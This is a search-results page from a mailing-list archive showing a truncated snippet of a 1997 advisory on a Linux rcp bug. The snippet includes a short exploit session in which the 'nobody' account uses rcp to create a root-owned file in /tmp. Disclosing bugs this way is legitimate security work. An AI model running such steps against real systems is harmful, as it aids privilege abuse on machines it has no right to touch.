Displaying 1 result from an estimated 1 matches for "oberheim".
Did you mean:
burheim
1997 Feb 03
1
Linux rcp bug
...A httpd server, which by default executes
all cgi-bin scripts under this uid.
PLATFORMS: We tested this only on Linux Red Hat 4.0 and Linux Slackware 3.1
EXPLOIT: This is kind of simple:
root[11:20][504]~# su - nobody
[nobody@slip-70-8 /]$ id
uid=65535(nobody) gid=65535
[nobody@slip-70-8 /]$ rcp oberheim@moe.cc.utexas.edu:brb /tmp/test
[nobody@slip-70-8 /]$ ls -la /tmp/test
-rw------- 1 root 65535 0 Jan 29 11:20 /tmp/test
But then of course this is unrealistic, since regular users don''t usually
have access to the ''nobody'' account. The password is usually...